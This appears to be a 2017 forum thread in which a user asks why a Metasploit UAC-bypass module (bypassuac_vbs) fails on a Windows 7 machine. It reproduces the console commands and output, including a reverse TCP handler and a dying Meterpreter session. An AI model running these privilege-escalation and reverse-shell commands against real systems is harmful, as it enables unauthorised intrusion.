isaac_204 Posted January 8, 2017 Posted January 8, 2017 Hello guys I ran into a problem trying to bypass the UAC on my Windows 7 machine. I used the bypassuac_vbs exploit but this is what happened. Thanks in advance! msf exploit(handler) > use exploit/windows/local/bypassuac_vbs msf exploit(bypassuac_vbs) > show options Module options (exploit/windows/local/bypassuac_vbs): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Automatic msf exploit(bypassuac_vbs) > set SESSION 1 SESSION => 1 msf exploit(bypassuac_vbs) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.14:4444 msf exploit(bypassuac_vbs) > [+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable. [*] UAC is Enabled, checking level... [*] 192.168.1.5 - Meterpreter session 1 closed. Reason: Died [-] Exploit failed: Rex::TimeoutError Operation timed out. Quote
SuperHofstad Posted January 14, 2017 Posted January 14, 2017 Does it close when you send " exploit -j " ? Or is it timed? Quote
isaac_204 Posted January 14, 2017 Author Posted January 14, 2017 It closes Meterpreter session 1 closed. Reason: Died and then Exploit failed: Timeout error. Check the last two lines of the post I wrote! Thanks in advance! Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.